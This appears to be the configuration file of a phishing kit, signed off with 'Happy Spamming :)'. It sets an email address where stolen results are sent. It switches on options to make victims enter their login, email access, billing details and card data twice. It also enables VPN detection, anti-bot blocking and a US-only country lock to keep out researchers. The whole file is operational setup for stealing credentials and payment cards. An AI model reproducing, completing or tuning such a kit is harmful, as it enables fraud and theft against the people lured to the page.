; .------..------.
; |E.--. ||P.--. |
; | (\/) || :/\: |
; | :\/: || (__) |
; | '--'E|| '--'P|
; `------'`------'

; - Always test your page
; - Happy Spamming :)

; Your email for results
; Options: email address

Email = "hexormikya@yandex.com"

; Double login
; Options: on or off

LoginTwice = "on"

; Double email access
; Options: on or off

EmailTwice = "on"

; Double billing
; Options: on or off

BillingTwice = "on"

; Double cc
; Options: on or off

CardTwice = "on"

; Check if user is using a VPN
; Options: on or off

VPN = "on"

; Special "cloudflare" protection
; will block 99% of bots in theory
; Options: on or off

CFProtection = "on"

; Allow access to a specific country
; Options: country code or off

LockCountry = "US"